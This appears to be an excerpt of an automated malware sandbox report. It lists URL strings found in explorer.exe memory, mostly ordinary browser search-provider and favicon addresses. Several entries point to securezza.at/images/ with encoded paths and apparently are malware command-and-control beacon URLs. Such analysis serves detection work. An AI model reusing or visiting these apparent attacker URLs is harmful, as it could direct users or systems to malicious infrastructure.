Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000014.00000000.1277133124.00970000.00000002.00000001.sdmpString found in binary or memory: http://securezza.at/images/n58fjtZhTCpMhOny/d_2F5nDeAbVbALK/_2FYd0KZgbPGjaCEmW/loCUkF_2F/0E54l0
Source: explorer.exe, 00000014.00000000.1287822496.05D16000.00000004.00000001.sdmpString found in binary or memory: http://securezza.at/images/n58fjtZhTCpMhOny/d_2F5nDeAbVbALK/_2FYd0KZgbPGjaCEmW/loCUkF_2F/0E54l0KaY43
Source: explorer.exe, 00000014.00000000.1276986093.0087D000.00000004.00000020.sdmpString found in binary or memory: http://securezza.at/images/vt6G1XeymRxjyw99/uJu1Co0NCp8XDAF/A4EL32Pwn0gFTMv5l3/bFOIqzhKU/lZjwIJqkCLP
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000014.00000000.1289585565.06460000.00000008.00000001.sdmpString found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000014.00000000.1282169755.03A10000.00000008.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000014.00000000.1289585565.06460000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000014.00000000.1278404490.01ED0000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000014.00000000.1289771330.06519000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
